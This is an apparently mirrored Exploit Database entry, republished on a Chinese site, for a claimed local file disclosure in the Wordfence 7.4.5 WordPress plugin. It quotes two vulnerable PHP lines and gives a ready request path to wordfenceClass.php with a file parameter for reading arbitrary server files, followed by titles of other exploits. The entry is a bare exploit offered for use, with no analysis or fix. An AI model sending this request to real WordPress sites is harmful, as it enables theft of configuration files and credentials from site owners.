WordPress Plugin Wordfence.7.4.5 – Local File Disclosure

Exploit Database
112 阅读

作者： Mehran Feizi

日期： 2020-02-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48061/

#Tile: WordPress Plugin wordfence.7.4.5 - Local File Disclosure
#Author: mehran feizi
#Category: webapps
#Date: 2020-02-12
#vendor home page: https://wordpress.org/plugins/wordfence/

==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

last Exploits
WordPress Plugin Wordfence.7.4.5 – Local File Disclosure的更多信息

Specialized Data Systems Parent Connect 2010.04.11 – Multiple SQL Injections：
WordPress Plugin Traffic Analyzer 3.4.2 – Blind SQL Injection：
Ktools Photostore 4.7.5 – Multiple Vulnerabilities：
Joomla! Component JEXTN Video Gallery 3.0.5 – ‘id’ SQL Injection：
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass：
WordPress adivaha Travel Plugin 2.3 – Reflected XSS：
Compro Technology IP Camera – ‘killps.cgi’ Denial of Service (DoS)：
Cisco node-jos < 0.11.0 - Re-sign Tokens：